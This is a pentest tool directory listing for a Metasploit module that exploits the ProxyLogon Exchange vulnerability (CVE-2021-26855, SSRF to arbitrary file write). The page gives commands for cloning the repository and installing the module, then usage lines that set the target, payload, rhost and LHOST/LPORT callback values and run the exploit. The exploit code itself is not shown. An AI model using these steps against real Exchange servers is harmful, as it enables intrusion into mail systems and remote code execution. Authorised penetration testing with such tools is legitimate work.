Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
ProxyLogon-CVE-2021-26855-metasploit — CVE-2021-26855 proxyLogon metasploit exploit script | Kitploit
Tools/GitHubGitHub/taroballzchen/proxylogon-cve-2021-26855-metasploit
Exploit FrameworksVulnerability AnalysisWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubtaroballzchen/proxylogon-cve-2021-26855-metasploit

ProxyLogon-CVE-2021-26855-metasploit

CVE-2021-26855 proxyLogon metasploit exploit script

View Repository
4435 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

ProxyLogon-CVE-2021-26855-metasploit

CVE-2021-26855 proxyLogon exchange ssrf to arbitrary file write metasploit exploit script

preparation

root@kitploit:~
git clone https://github.com/TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit
cd ProxyLogon-CVE-2021-26855-metasploit
mkdir -p ~/.msf4/modules/exploits/windows/
cp exchange_ssrf_to_arbitrary_file_write.py ~/.msf4/modules/exploits/windows/
chmod +x ~/.msf4/modules/exploits/windows/exchange_ssrf_to_arbitrary_file_write.py
msfconsole

metasploit usage

root@kitploit:~
set target <target>
set PAYLOAD <payload>
set rhost <vuln ip>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>

exploit

exploit

Download Tool